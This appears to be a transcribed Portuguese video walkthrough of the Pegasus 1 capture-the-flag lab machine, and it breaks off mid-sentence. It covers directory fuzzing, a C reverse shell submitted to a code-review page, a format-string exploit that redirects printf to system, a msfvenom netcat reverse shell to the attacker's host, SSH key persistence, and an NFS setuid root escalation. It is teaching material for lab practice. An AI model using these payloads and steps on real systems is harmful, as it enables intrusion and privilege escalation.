Fala pessoal, beleza? Vamos começar aqui nossa penúltima máquina, a Pegasus 1. Essa máquina ela não é muito real life assim, né? Ela tem algumas coisinhas de real life, mas ela é meio viajadinha. Mas o que acontece? Nessa máquina a gente vai estudar exploração de binário, então não tem problema ela ter umas viagens aqui que não é muito vida real, porque a ideia aqui não é simular, né, um pentest, e sim a gente estudar aí em relação à exploração desse binário aqui, né, que para a gente poder fazer o nosso buffer overflow e alterar o fluxo de execução desse binário. O que a gente vai explorar nessa máquina aqui é um ataque que chama Format String Attack. Aqui no documento da OASP, aqui na descrição tem vários links para vocês estudarem sobre os temas que a gente está falando aqui, tá? Vai ter alguns papers aqui para vocês estudarem Buffer Overflow e o ataque de Format String, mostrando ali de forma mais profunda, né, como que é o comportamento da memória enquanto você está fazendo esse ataque e tal. Tá tudo descrito aqui embaixo, tá? Então, o que você precisa, né, para conseguir fazer o format string attack aqui? Tem que achar um ponto na aplicação onde tem um printf, por exemplo, né, que esteja convertendo esse ANSI, que é a linguagem de máquina, que convertendo ela para para alguma uma string que um humano consegue ler ali, né? Então, tipo, o printf vai fazer isso para a gente. Ele vai apresentar na tela ali alguma string, alguma coisa num formato que a gente consegue ler, certo? Então, o que acontece, né? Dentro da linguagem C aqui, e outras linguagens também, a gente tem alguns formatos de representação aonde você passa, por exemplo, um %x aqui no caso do C aqui, como format string, ele vai trazer para você algumas informações, como por exemplo aqui, ele vai ler, né, os dados da stack, como o %x, né, e o %n, por exemplo, vai escrever esses dados vai escrever dados ali na memória. Então, por que isso é legal da gente saber isso, né? Porque na exploração desse binário que a gente vai fazer aqui, a gente vai explorar essa falha aqui para a gente conseguir encontrar, né, conseguir escrever em EIP, e nesse momento que a gente conseguir escrever em EIP, a gente vai alterar o fluxo de execução do programa para que ele execute um system, né, e a hora que ele executar esse system, a gente vai conseguir abrir uma sessão aí com a máquina, o usuário que está rodando naquela aplicação. Aí na sequência a gente vai fazer a pós-exploração aqui normal da máquina, beleza? Então vamos lá, na parte de exploração aqui da máquina, se você rodar aqui o Nmap, eu vou passar o menos A aqui porque é CTF, né? Menos V, 192.68.1.7. Ele vai demorar um pouquinho aqui. Enquanto ele está executando, eu já vou até abrir aqui o Deerbuster. Peraí. Então, ele já executou aqui o Nmap pra gente, né? A gente já viu que a porta 8088 está aberta. Se você rodar um dib, coisa do tipo aí dentro desse cara, você vai ver que tem um arquivo PHP lá, né, que chama submit.php. Então você pode fazer esse fuzzing aqui como você quiser, tá? Você pode jogar qualquer tipo de outros programas aí que fazem o fuzzing para você, mas nesse caso aqui a gente vai usar o Deerbuster mesmo, que está mais fácil aqui. A gente passa aqui a URL, http //192.68.1.7 na porta 8088. Eu não quero que ele faça brute force diretórios, porque eu quero só um arquivo PHP que vocês já vão ver, né? Que vai ter um arquivo chamado code review ali dentro, que vai ser esse cara que vai mostrar pra gente vai ser possível acessar, né, a máquina remotamente. Eu vou passar aqui a word list, então aqui em barra usr share word lists. Eu vou entrar nas word lists do Deerbuster mesmo e eu vou passar essa diretório list aqui, ó, a medium, não é a maior de todas, é a média. Já é o suficiente aqui para esse cara, tá? Então eu vou mandar um start aqui. Ele tá executando aqui o Deerbuster. Olha, ele já achou o submit.php. Então vamos deixar ele continuar rodando aqui. Ele vai chegar no momento aqui que ele vai encontrar, né, um outro cara que chama codereview.php. Então vou deixar ele rodando aqui mais um pouquinho. Bom, vai demorar uma cara aqui. Você já sabe que se você continuar aí vai chegar nessa URL que eu estou falando para vocês, tá? Aqui o que importa nessa máquina não é nem a exploração, é a pós-exploração, tá? Aqui, ó, se você abrir o submit, né, dentro dessa máquina aí, aqui ele não vai ter esse código, foi eu que joguei ele aqui. Esse código, o que esse cara faz? Ele é um code review, então quando você joga, né, o código aqui, ele faz uma análise do código lá dentro do host, né, e não sei o que ele faz depois, mas enfim, a gente vai usar esse cara aqui para poder abrir a nossa sessão do lado de lá. Isso aqui é uma shell em C, tem o link aqui do Git aqui
do 0xABE.io, foi ele que escreveu essa shell aqui. Ela faz uma comunicação via socket, né, normal, como todas as outras shells que a gente utiliza normalmente aí. Então, se eu só passo o IP aqui, eu passei o IP do meu Kali na porta 8081. Então, eu vou abrir o handler aqui no Kali. Eu estou indo mais rápido nessa parte porque não interessa muito o que vai ter aqui a exploração do binário que a gente vai fazer, tá? NC-LVP, para escutar em modo verboso na 8081. Agora eu vou dar um submit aqui. E ele abriu aqui a sessão pra gente. Eu vou até fechar esse cara aqui, ele tá rodando ainda, ó, tá rodando um monte de requisição. Até ele chegar no code review ali vai demorar. E não é isso que importa pra gente aqui. Tô fechando. Beleza, ó, a gente pegou aqui o user do Mike por enquanto, né? Deixa eu dar um PTY aqui, só para eu poder spawnar um PTY lá que vai ficar melhor da gente trampar. Aí, beleza. Então aqui, ó, dentro do usuário do Mike, você vai ver que tem um binário aqui, ó, que chama myFirst. Você dá um file nele aqui, myLearnFirst. Você vai ver que ele é um binário ELF, né, de Linux aqui, ó, 32 bits. Que ele também está utilizando bibliotecas dinâmicas aqui, as shared libs, né, do Linux. Então, é bem parecido com o que a gente já fez ontem, né? E ele também é not stripped, então, ou seja, dá para você fazer depuração desse cara aqui. Dentro dessa máquina já vem com o GDB aqui, então é legal que a gente pode fazer todo o debug aqui dentro, sem precisar tirar o binário daqui e jogar na sandbox e tal. É mais para a gente estudar mesmo, né? Como eu disse, essa máquina não é muito real life, assim, a pós-exploração dela é real life, né? Depois que vocês já vão entender. Mas em relação à exploração desse binário aqui, é mais para estudo mesmo. Então agora que a gente já tem essas primeiras informações aí, a gente precisa executar uma vez aqui o my_first para a gente entender o que o binário faz aqui, né? Ó. Então ele tem quatro funçõezinhas aqui. Um é uma calculadora simples, o segundo é um string replay e o terceiro um string reverse, né? E o quarto é para sair da aplicação. Se você entrar no primeiro aqui, ó, ele vai pedir um número, daí mais um número ele vai somar um pelo outro, beleza? Bem simples, né? Se a gente voltar aqui no paper da WASP, ele mostra aqui, ó, que para a gente poder fazer o ataque do format string, a gente tem que pegar um local onde está rolando um printf, por exemplo, e alterar o que vai ser apresentado na tela, né? Por exemplo, um %x aqui para ler o que está na stack, né? Ou até um %n para escrever aqui na stack. Então, como é que a gente vai fazer isso? Aqui, ó, nessa primeira execução aqui, ele está pedindo um número. Se a gente passar aqui um %x, por exemplo, e um outro número, nesse caso ele não está vulnerável, ó, porque ele só escreveu 0 aqui, mas ele não mostrou para a gente endereço de memória. Só que se a gente jogar aqui no segundo parâmetro aqui, ó, um %x, repare que ele mostrou aqui para a gente, ó, o que está escrito na memória nesse momento. Então, se a gente fizer essa mesma execução aqui e jogar aqui várias vezes, né, o %x, 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 várias vezes, ó, ele mostrou pra gente várias vezes aqui, ó, alguns endereçamentos de memória, né, dentro da stack. Então a gente está conseguindo ler memória, legal. Agora a gente precisa ver em qual momento aqui nessa leitura de memória que a gente vai conseguir chegar em EIP. Como é que a gente vai saber isso? Nesse caso aqui, se a gente passar uma instrução para esse cara aqui, para esse segundo parâmetro, né, por exemplo, vamos passar 4 letras A's aqui. Se ele começar a repetir, né, essas letras A significa que a gente conseguiu chegar no momento onde ele está escrevendo em IP. Né? Tá? Então, o que a gente vai fazer aqui? Primeiro a gente vai sair desse cara aqui e fazer o nosso fuzz para conseguir encontrar em que momento a gente vai poder inserir aqui outras instruções, né, para a gente fazer um desvio de fluxo aí de execução desse binário. Então, para isso a gente pode usar o Python aqui, "-c de linha de comando, vou mandar um print aqui, para ele printar algumas informações. Então, ó, o primeiro parâmetro que a gente pode passar é 1 para ele entrar dentro da calculadorinha ali. Então, eu vou mandar um 1 aqui. E um /n, por que o /n? Porque o /n quebra a linha, é o mesmo que pressionar um Enter ali, né? Então, eu vou passar o 1 de novo, porque o próximo parâmetro também é numérico ali, né? Agora sim a gente vai colocar aqui a nossa execução aqui de comando. Então, primeiro a gente vai testar, passar como parâmetro aqui, né, os 4 A's lá. Aí na sequência, a gente pode mandar ele printar várias vezes, né, um %x lá para a gente ver o que tem em memória.
Se você for testando um por um, até você chegar no número 8, né, se você testar 8 tentativas de leitura de memória na sequência aqui, mostrando os próximos 8 bytes ali, né, a gente vai conseguir chegar no momento onde ele começa a se repetir, quer ver? Então eu posso colocar aqui 8 vezes %x. E aí na sequência eu coloco aqui um /n para quebrar a linha e um 4 para sair do fluxo ali da aplicação. Então se eu mandar executar isso aqui, eu vou dar um pipe.barra my underline first para executar esse cara lá no my first. Opa, peraí que deu erro no meu Python aqui, escrevi errado. Deixa eu copiar esse aqui. Vou vir aqui no meu bloco de notas para eu poder arrumar esse aqui, que é bom, a gente vai ter que anotar bastante coisa nesse bloco de notas. MC print, tá, aqui tá certo, faltou fechar aqui, ó. Aí, agora vai. Ó, então repare que ele começou, a gente escreveu o AAA aqui, ó, tá vendo? Né? 41, 41, 41, 41. Aí ele começou a ler outras coisas de memória aqui, até chegar no momento que ele começou a ler 41, 41, 41 de novo. Ou seja, que é o parâmetro que a gente passou para cá. Esse é o local onde a gente vai começar a tentar inserir, né, comandos aqui dentro. Então, primeiro a gente pode alterar esse nó. Agora que a gente sabe que é 8 o número aqui de bytes que a gente tem que passar, a gente pode alterar essa execução aqui, ó, e passar aqui um 8 cifrão aqui, ó, que é isso quer dizer que ele vai fazer essa leitura, né, da memória depois de 8 bytes aqui, ó. Então a gente pode executar esse cara lá. Agora que eu vou passar isso aqui, eu posso até tirar essa execução final aqui que não precisa. Então executando esse cara aqui, ó, o que ele mostrou pra gente aqui, ó, o AAA que a gente mandou e o endereço de memória aqui que está lendo exatamente a IP, que é onde a gente escreveu o AAA. Então, agora que a gente chegou nesse ponto, né, que a gente sabe aonde a gente está, onde está a IP, a gente pode começar a querer escrever aqui alguma coisa, né, estourar esse buffer e sobrescrever com outras instruções aqui para fazer movimentação no fluxo aí de execução desse binário. Então, o que a gente precisa saber primeiro? A gente vai ter que anotar algumas informações aqui. O nosso primeiro payload a gente já criou ele aqui. Eu só vou modificar aqui para escrever isso para dentro do payload, que eu vou criar um arquivo chamado payload e vou escrevendo dentro dele essas execuções nossas aqui. Beleza? Então agora a primeira coisa que a gente precisa fazer é conseguir descobrir dentro da aplicação qual que é o endereço de system, né, para a gente conseguir fazer a modificação aí desse printf para system. Então a gente vai mandar ele executar system. Então para isso eu posso vir aqui no gdb.my_first. Ele abriu o GDB, né? Aqui, como eu disse, nessa aplicação aqui, ele já vem com o GDB para a gente poder brincar aqui. Não precisa puxar para a sandbox, né, o binário. Então aqui eu vou criar um breakpoint com o comando break. Eu quero criar um breakpoint dentro da função main lá na libc. Então como é que eu vou fazer isso, né? Aí se você estivesse fazendo, aqui nesse caso nosso, a gente abriu uma shell interativa com o netcat, mas a gente não consegue usar o autocomplete, né, com o tab, por exemplo. Se você digitasse aqui underline libc e apertasse tab, você ia conseguir ver as opções, né, que você tem aqui para utilizar de breakpoint dentro da libc aqui. Mas nesse caso eu vou digitar aqui o start underline main. Então eu criei aqui um breakpoint, ó, dentro da instrução, aqui dentro da hora que ele inicia, né, a função main dentro da libc. Então agora se eu rodar ele aqui, ó, ele parou no breakpoint. Certo? Então agora que ele parou nesse breakpoint, a gente consegue ler aqui algumas instruções, né, para saber qual é o offset de algumas funções dentro dessa execução aqui. Então se eu der um print no system, ó, ele mostrou para a gente aqui, né, uma variável aqui do system. Então a gente vai anotar essa informação aqui dentro das nossas anotações aqui para a criação do nosso exploit. Eu vou chamar esse cara de system e vou jogar ele aqui. Agora que eu sei qual que é o endereço de system, eu vou até sair aqui, dar um quit. A gente pode usar um cara chamado objdump aqui dentro do Linux para conseguir ver o offset dessas funções que estão rodando dentro desse binário. Então eu vou dar um objdump -r maiúsculo aqui my underline first.
Ó, repare que ele mostra pra gente aqui o stdin, printf, fgets, puts, tudo que está rodando lá dentro desse binário. O que interessa pra gente é o printf, ó. Por quê? Porque a gente vai fazer esse printf, a execução desse printf desviar para o system, né? Então vamos anotar ele aqui, printf igual, vou até colocar um 0x aqui para ficar igual. Maravilha. Agora que a gente já tem essas informações, a gente pode voltar aqui para a execução, né, para a escrita aqui do nosso exploit, e a gente vai ter que fazer aí, então, alguns testes. Esse AAA que a gente está escrevendo aqui do payload, ó, a gente pode modificar ele. Você pode pegar o endereço do printf aqui, ó. O que a gente vai fazer? Para jogar ele aqui como parâmetro, a gente vai ter que jogar ele de trás para frente, tá? Então, como é que você vai fazer isso? Você primeiro divide ele aqui, né, em bytes aqui, né? Cada um byte cada divisão dessa, você vai dar um /x aqui, ó, para ele ficar no formato hexadecimal aqui, 9b /x04 /x08. Por que a gente vai fazer isso? Porque aqui, ó, no lugar desse AAA, se você colocar /x41, que é o mesmo que A em hexadecimal, 41 /x41 /x41, e executar esse cara lá na... Deixa só, antes de a gente jogar isso no payload, eu vou executar ele direto. My underline first. Então, ó, repare que mesmo a gente passando em hexadecimal, né, ele mostrou pra gente, ó, 41, 41, 41, beleza. Então, está funcionando, a gente precisa passar, então, ao invés do que a gente passou ali, ó, a gente vai passar o offset do printf. Então, eu vou tirar esse cara daqui, ó, e vou jogar o printf nesse cara aqui. A gente ainda está usando o %x aqui só para ler, tá, essa instrução de memória. Então, ó, ele conseguiu ler aqui, né, o offset do printf, ó, 8049 BFC, tá vendo? Ó, 8049 BFC. Se você tentar escrever nesse cara aqui, ó, vou trocar o x por um n aqui. Trocar o x por n aqui para escrever, né? E eu tentar escrever aqui, ó, ele conseguiu escrever, né, e deu segmentation fault. Então, ó, geralmente aí na vida real, vai ter um cara que chama ASLR aí dentro da máquina, né, que vai te prejudicar aí na hora de executar o teu buffer overflow. O que esse cara faz, né? O ASLR, ele embaralha, né, os dados que estão alocados aí em memória. Ele chama Address Space Layout Randomization. Ele faz uma randomização desses dados, né, alocados em memória, para evitar aí mesmo que você faça ataques de buffer overflow. Então, existem até exploits para desabilitar a SLR, né? Você pode tentar fazer bypass disso de alguma forma, mas aqui na máquina, ó, se você se você digitar aqui os comandos para chama ulimit, quer ver, o ulimit -s, se aparecer um número aqui, ó, ele está mostrando que tá setado como 8192 o limite. Eu posso então setar ele aqui, ó, o limite -s unlimited, sem limites. Então, se eu der um limite -s de novo aqui agora, claro que a gente só consegue fazer isso porque é CTF, não, ele está desabilitado agora. Na vida real você teria que fazer isso de outras formas, rodar exploit, etc, né? A gente não consegue desabilitar fácil assim algumas funções administrativas como essa. Nesse caso aqui tá simples. Assim a gente consegue executar, né, o nosso buffer overflow sem se preocupar aí com algum tipo de bloqueio ou até mesmo de confusão aí, né, relacionado aos registradores ali. Então agora que a gente descobriu que a gente consegue fazer ele executar, a gente deu um "-n" aqui para ele escrever, né, em EIP a instrução de execução do printf. Agora a gente vai precisar fazer umas alterações aqui para conseguir transformar esse cara aí, né, na função system em vez do printf. Então a gente vai escrever isso aqui dentro do nosso payload agora, para a gente poder debugar. Então eu vou copiar esse cara aqui, né? Vou escrever aqui, ó. Ele criou o payload pra gente. Se você der um cat no payload aqui,
Você vai ver que é só a saída 1, 1 e a execução ali do nosso printf. Se você abrir aqui o GDB, ./my_first, você pode usar o R para ou run, tanto faz, e passar como parâmetro para dentro dele o payload. Então repare que ele executou, né, a nossa inserção lá do printf, né, deu o segmentation fault e ele trouxe para a gente aqui o endereço, né, de memória da onde aconteceu esse segmentation fault. Então a gente vai anotar esse cara aqui, porque a gente vai utilizar, a gente vai fazer esse cara aqui, ó, se transformar, né, no nosso system, que é o que a gente quer fazer a gente quer fazer com que o fluxo da execução desse programa, nesse momento aqui, ao invés dele executar o printf, né, como a gente tentou aqui, a gente vai direcionar esse fluxo para o system, porque a gente quer abrir uma sessão com esse cara aí. Então, como é que a gente vai fazer isso agora, né? Assim que a gente já conseguiu então essa primeira informação aqui de qual que é o endereçamento de memória aqui quando a gente conseguiu estourar o buffer ali e escrever em EIP, né? Então a gente vai tentar agora para a gente conseguir fazer esse cara se transformar em system aqui, a gente vai ter que pegar esse endereço do system, dividir esse endereço do system em 2. Ó, se você der um print system aqui na execução do programa, você vai pegar o endereço de system aqui. Esse endereço de system, né, ele mudou aqui, ó. Esse endereço de system que a gente vai transformar o fluxo da execução aqui do programa em system, a gente pode pegar esse cara aqui e dividir ele em 2, ó. 406 e 9060. Por quê? Porque a gente vai transformar isso, né, numa maneira que a gente consiga inserir aqui dentro do nosso payload. Então, para a gente poder fazer, para a gente poder escrever esse cara ali dentro do payload, a gente precisa primeiro transformar esse cara em decimal para a gente poder escrever ele aqui dentro do nosso payload. Deixa eu abrir um outro terminalzinho aqui. Eu vou dar um Python "-c" de linha de comando, print. Eu vou jogar esses dois valores aqui. Primeiro a gente vai jogar o 9060 em hex aqui, 0x 9060. E eu vou subtrair, subtrair por 4006 em hexa também, 0x 4006. Opa, escrevi Python errado, aí não vai mesmo. Então a gente pegou aqui o nosso valor aqui, né, em decimal. Então com esse valor aqui, não, eu fiz a conta errado, cara. Não é com o 4006 não, é com o 0004 aqui, ó. Desculpa. A gente vai pegar esse valor do segundo desses 2 bytes aqui do 9006 e vai subtrair em vez do 4006 aqui, eu fiz errado. É difícil fazer isso aqui, cara. A gente vai trocar por 0004. É 0004, não 4004. Tá, agora sim. Esse 4004, ó, é esse cara aqui, ó. 4004 e o 9060 é esse cara aqui, ó. 9060 e 4004. Tava fazendo a conta errada aí, ia dar tudo errado mesmo. Esse valor aqui é o que a gente vai precisar colocar como decimal aqui dentro do nosso payload. Então, se eu copiar o payload aqui para a gente poder editar ele, ó, antes dessa execução aqui, eu vou passar, né, um percent %u aqui para um valor decimal. Dentro desse percent %u eu vou passar esse valor decimal aqui, ó, que é o mesmo que essa segunda parte aqui, né, do nosso system, tá? Se a gente executar esse cara lá no... A gente escreveu ele dentro do payload. Opa, escrevi no lugar errado. A gente escreveu ele dentro do payload. Vou executar aqui dentro do GDB. My_first.
Espera aí que deu erro. Deixa eu dar um 4 para sair aqui. Primeiro eu vou escrever ele aqui. Aí, beleza. GDB my ponto barra my underline first. Aí que eu só... também eu dei um run ali, não joguei o payload para dentro, aí não funciona, né? Payload. Ó, você pode ver que ele mudou a execução do programa aqui, tanto que deu esse bug aqui, ó, ficou tudo em branco aqui, ó, né? E rolou de novo o segmentation fault. E a gente tem mais um endereço aqui de memória, que é onde a gente fez a próxima treta aqui, né? Onde a gente conseguiu inserir um pedacinho ali do nosso system. Agora a gente precisa inserir o outro pedacinho do system, certo? Então, agora que a gente já fez aquela primeira conta, a gente precisa fazer a segunda baseado nesse número aqui que a gente recebeu, né, da memória aqui, baseado nesse valor aqui, nesse offset. Então, como a gente aumentou, como a gente vai adicionar mais 4 bytes aqui, a gente já adicionou 4, a gente precisa escrever no próximo endereço aqui, né? A gente está escrevendo, né, dentro desse oitavo endereço aqui, a gente precisa escrever dentro de um nono endereço. Como é que a gente vai fazer isso? Eu vou pegar esse valor aqui, ó, do printf, que é onde a gente está escrevendo na aplicação aqui. Você pode fazer isso de vários jeitos, mas aqui, ó, se a gente jogar esse hex aqui, né, e mandar converter, esse aqui é um conversor de hexadecimal para decimal online. Tem como se fazer isso de vários jeitos, né? Então ele está trazendo aqui um número decimal, ó, com final 9804. Se eu fizer o contrário aqui, jogar 9804, só que eu vou ter que adicionar, eu vou ter que aumentar, né, mais 2 bytes nesse cara. Por quê? Porque aqui, ó, a gente está passando os primeiros, né, 4 bytes aqui do system, ó, tá passando o 9060, né? Então, para passar agora o 4006, eu preciso de mais 2 bytes aqui para o 40 e para o 06, né? Então, eu preciso aumentar esse cara aqui mais dois números, 4, 5, 6. Então, agora eu preciso ver qual que é o valor aqui, ó. Ele mudou o final para BFE. Então aqui, ó, aqui onde a gente está no FC, tá vendo? A gente vai mudar para FE. Então eu vou copiar esse cara aqui do jeito que ele está aqui e vou somar aqui, ó, aumentando mais 2 bytes aqui, ó, FE. Então agora que a gente fez, né, que a gente aumentou mais esses 2 bytes, a gente vai conseguir escrever o resto que falta aqui, né, o 4006, dentro do próximo endereço aqui, ó, que eu vou adicionar exatamente como a gente fez no oitavo aqui. A gente vai escrever no nono aqui, no 9. Só que a gente ainda precisa descobrir o valor decimal desse cara para a gente poder concatenar aqui, né, depois dessa primeira parte aqui do system. Então eu preciso descobrir qual que é o próximo valor decimal aqui para eu poder preencher esse cara aqui, certo? Então eu vou ter que fazer as mesmas contas que a gente já fez anteriormente ali. Agora eu vou pegar esse valor aqui, ó, 9060, dividir ele aqui também, né? Então, só que agora eu vou pegar, ao invés desse 000 aqui, ó, eu vou pegar essa outra parte aqui que falta a gente colocar lá dentro, que é o 4006. Vou colocar ele aqui, ó. Então agora a gente vai executar de novo no Python aqui. "-c print 0x40006, né? 4006, desculpa, 0 só. 4006 menos 0x9060, que é esse cara aqui. Então a gente vai fazer isso aqui, né? Ó. O que vai acontecer? Se eu executar dessa forma aqui,
o resultado vai ser negativo. Eu não posso pôr um resultado negativo aqui, né, como decimal, que vai dar errado. Você pode adicionar mais um número 1 na frente aqui do 4006, que aí ele vai ficar um valor positivo. Eu posso copiar esse valor aqui, né? Esse é o valor que eu vou ter que adicionar aqui no meu exploit, ó. Aí só tem um porém, né? Como a gente aumentou o número de bytes aqui, ó, a gente aumentou 4 bytes aqui, né? A gente vai ter que diminuir 4 bytes desse cara aqui. Por quê? Porque a gente aumentou aqui, ó, 1, 2, 3, 4 bytes. Então eu vou ter que pegar aqui 56, ó, 55, 54, 53, 52. Então agora o que vai acontecer? Quando a gente executar esse cara aqui, né, ele vai conseguir modificar o fluxo da execução aqui teoricamente, ele vai conseguir modificar o fluxo da execução aqui dentro do binário, né, e executar o system. Quando ele executar o system, ele vai chamar, né, um arquivo ali que tá dentro da aplicação. Vamos ver se isso vai dar certo. Deixa eu copiar esse cara aqui, vou escrever ele dentro do payload. Agora que eu escrevi ele aqui dentro do payload, né, a gente vai dar um gdb de novo. ./my_first. Eu vou dar um run aqui, para dentro do run eu vou executar o payload. Tá, ele funcionou, mas não funcionou. Que maravilha, porque ele não apareceu o SH aqui, ou seja, a gente errou aqui nos cálculos. Vamos ter que acertar esses cálculos aqui. Não, na verdade foi um erro meu aqui, ó, bobeira. Esse cara aqui tá no lugar errado, porque a gente tá fazendo erradas concatenações aqui, ó. Esse valor decimal, ele é o correspondente desse endereçamento de memória. E esse valor decimal é o correspondente do próximo endereço de memória. Eu estava escrevendo tudo num lugar só, por isso que não estava funcionando. Deixa eu copiar esse cara aqui. Opa! Nesse caso, a ordem dos fatores altera o produto, sim. Deixa eu sair aqui, escrever nosso payload de novo, gdb.my_first. Vou dar um run e jogar para dentro do run o payload. Repare que agora funcionou, ó. Agora ele chamou o SH aqui, ó. Então, ele está tentando ler um arquivo que chama selection aqui, ó. Por que? Não faço ideia, mas ele está tentando ler um arquivo chamado selection. Então, o que a gente pode fazer? Agora que o nosso exploit funcionou e ele executou, né, o exec ali, né? A gente conseguiu fazer o exec funcionar, o system funcionar, e o system está chamando esse cara aqui chamado selection. Então, a gente pode criar um binário aqui dentro da aplicação, dentro do servidor agora, né, com algum conteúdo que a hora que ele chamar esse selection aqui, a gente vai conseguir então abrir uma sessão. Deixa eu dar um quit aqui para sair. Eu vou em tmp aqui. Eu vou dar um echo aqui. Deixa eu só criar o nosso payload aqui. msf venom -p de payload cmd /unix /reverse _ netcat. Só para ele escrever o netcat reverso aqui para a gente, para ficar mais bonitinho. lhost igual a 192.68.1.1, que é o IP do Kali. lport igual a 443, como sempre. -f how, para ele jogar o código aqui para a gente. Beleza, deixa eu copiar esse cara aqui. Eu vou fazer essa saída aqui, ter esse mesmo nome aqui, ó, selection. Para a gente conseguir escrever esse dois pontos aqui, eu preciso dar uma barra invertida para poder dar um escape aqui. Então, já dei um echo aqui, joguei o payload, né, e estou chamando esse cara de selection dois pontos. Então, se eu der um ls aqui, está aqui o selection dois pontos. Então, eu preciso dar permissão de execução para ele, chmod mais x selection. Beleza? Eu vou dar um chmod 777 selection
para poder dar permissão para qualquer usuário do sistema executar ele, que se a gente não der permissão, talvez o binário que a gente está explorando não consiga abrir ele. Agora que a gente já deu as permissões, a gente precisa criar uma variável de ambiente para que a hora que o sistema chame aqui, ó, o selection, ele consiga entender aonde está, né, o selection e executar ele. Então a gente pode usar o export patch igual cifrão patch / tmp. Por quê? Para a gente adicionar dentro do patch, né, o tmp. Agora você dá um cat no patch aqui, ó. Opa. Nunca mais vai parar agora. Que delícia. Escrevi errado. Se eu der um Ctrl C, eu vou ter que abrir a sessão de novo. Legal, não tem problema. Voltar aqui no site aqui. Foi. Só spawnar um TTY aqui. Então agora se você der um cat na variável do patch, você vai ver que tem cadê o /tmp? Não entrou aqui. Vamos escrever de novo. Export patch igual patch /tmp. Catching patch. Beleza, agora o TMP está aqui, tá vendo? Então a gente vai, se a gente chamar agora o nosso selection ali, ele vai abrir, né, a sessão. Então eu vou até abrir outro terminal aqui. Peraí que eu abri errado. Vou até abrir outro terminal aqui. Sudo nc-nlvp na 443. Então repare que a gente está com o usuário Mike. Se a gente tentar ir aqui, ó, cd/home, tem a pasta do John, ó, cd/John, a gente não tem permissão, tá vendo? Só que aqui na nossa pasta, ó, esse binário myFirst, o dono dele é o John. Então, como a gente vai explorar o myFirst, a gente vai ganhar o acesso do John. Então, o que a gente vai fazer agora? A gente já deixou o listening esperando aqui e a gente já criou, né, o nosso exploit ali e criou também o binário que vai ser chamado aqui, que é o selection. Então, agora a gente vai executar o nosso exploit aqui. Deixa eu só alterar aqui para ele não... Ao invés de escrever no payload, eu vou mandar ele executar direto no my_first. Então, eu vou executar esse cara aqui. Repare que nesse momento, ó, opa, não rolou. Eu acho que eu sei o que é. Provavelmente é porque eu não depois que eu reiniciei a máquina, eu não desabilitei o ASLR. Vou desabilitar ele aqui. O limit -S unlimited. Então agora eu vou abrir o GDB aqui. /my_first. Vou rodar passando aqui o payload. Maneiro, deu permissão negada. Por quê? Porque a gente não deu o chmod mais X lá. Boa, mas pelo menos está funcionando agora. Deixa eu ir lá no... Viu? Era o ASLR que estava segurando a execução do nosso exploit, porque eu resetei a máquina e não desabilitei de novo a ASLR. cd/tmp chmod mais X selection. Vamos ver se agora vai. gdb, opa, cd/home, cdmic, gdb .my_myFirst, R passando o payload. E agora foi, maravilha. Recebemos aqui a nossa conexão do Mike. Mas agora se a gente for lá em /home/John, opa, cd/home/John,
a gente conseguiu entrar no diretório dele aqui. Aí, beleza. Então, o que que a gente vai fazer? Eu vou até fechar esse cara aqui em cima, que a gente não precisa mais dele. Eu vou entrar no meu diretório do SSH aqui, .ssh, e eu vou entrar no .ssh aqui do John também, .ssh. Ó, aqui ele tem as chaves, né, dentro do servidor que permitem os acessos. Deixei eu aqui dentro do meu Kali. Eu vou criar uma chave para eu poder me conectar lá. Então eu vou criar aqui um SSH caging "-t" de tipo, né, do formato aqui RSA. E eu vou passar um "-c" aqui para passar o usuário John, que é o que a gente vai conectar lá. Ele está pedindo aqui um nome, né, da chave que a gente vai criar. Vou chamar aqui de John Key. Não vou por senha nenhuma. Beleza, ele criou aqui então a chave pública e a privada do John, né, que é a que a gente vai utilizar para conectar. Então vou dar um cat aqui na John Key public.pub, que esse aqui é o arquivo que a gente tem que jogar lá para dentro do server, né, para a gente poder conseguir se conectar via SSH lá. Então eu vou até arrumar aqui, ó, echo, e eu vou chamar esse cara aqui de no hosts, né, de hosts conhecidos. Na verdade não, na verdade a gente vai jogar esse cara nas chaves autorizadas, né? O host conhecido é para você poder conectar do alvo para outro lugar, né? Nesse caso aqui a gente quer conectar do Kali para aqui para dentro, então a gente vai ter que dizer que nas chaves autorizadas, authorized underline keys, né? A gente vai escrever ali a chave pública do John que a gente criou. Então eu vou jogar isso aqui dentro do alvo, né? Dentro de authorized keys. Então aqui agora eu tenho um authorized de keys aqui. Eu vou dar um chmod 600 no authorized keys. Então agora com a chave pública, com a chave privada, né, do John aqui, agora a gente pode se conectar lá. Então ssh John arroba 192.68.1.7 -i para passar a chave John Key. A gente conseguiu se conectar aqui dentro do alvo, beleza? Então agora a gente pode parar esse cara aqui, né? Sair já daqui. Deixa eu aumentar aqui. A gente... Aqui no John agora, se você der um sudo "-l", você vai ver que ele consegue montar um NFS aqui, ó, como root. Então se a gente montar ele aqui, sudo... Deixa eu copiar esse diretório completo aqui para montar o NFS. Deixa eu mandar um start aqui. Ó, ele startou o NFS. Então, agora a gente pode se conectar nesse NFS aqui dentro do nosso alvo. A gente pode usar o Nmap aqui para escanear esse cara, para ver o que tem de montagem aqui, né, remotamente. Dá um Nmap "-sv "-script igual a nfs show mount 192.68.1.7. Esperar aqui para ver o que ele vai trazer pra gente. Ó, a gente consegue montar aqui, ó, /opt /nfs. Então a gente pode montar aqui, vamos no tmp nosso aqui, mkdir Pegasus monte -tnfs 92.68.1.7 /opt /nfs em... Como é que é o nome que a gente criou mesmo? Pegasus. Tem dois pontinhos aqui, ó.
Beleza, ele montou aqui o Pegasus. Então a gente já está no diretório /apt /nfs. Então se a gente for aqui cd /apt /nfs, a gente está no mesmo diretório. Como a gente conseguiu montar esse diretório como root, a gente pode escrever, né, alguma coisa aqui dentro do NFS remotamente, que se a gente executar aqui dentro da máquina, ele vai estar como root. Quer ver? Você pode fazer um teste sudo touch batata. Então agora se eu der um ls-lh aqui, ó, o batata tem permissão de root, tá vendo? Então se eu escrever uma shell aqui, né, ou escrever algum tipo de exploit aqui dentro, utilizando o acesso remoto dessa forma aqui, né, a gente vai conseguir executar como root lá dentro do alvo, né? Claro que se a gente vai ter que dar permissão para o usuário John poder abrir o arquivo. Então a gente vai fazer a gente vai escrever aqui, né, a gente vai escrever um exploit aqui. Deixa eu mostrar para vocês até o exploit que a gente vai utilizar aqui. Então esse exploit ele basicamente ele está escrevendo aqui tá dando um exec.l aqui para rodar um bin.sh. Então a gente vai fazer isso aqui na nossa máquina primeiro. Vamos compilar ele aqui, né? Vim_suid.c. E aqui dentro a gente joga o exploit, né? Não esquece de incluir aqui as libs, stdlib, unistd e o sys aqui para 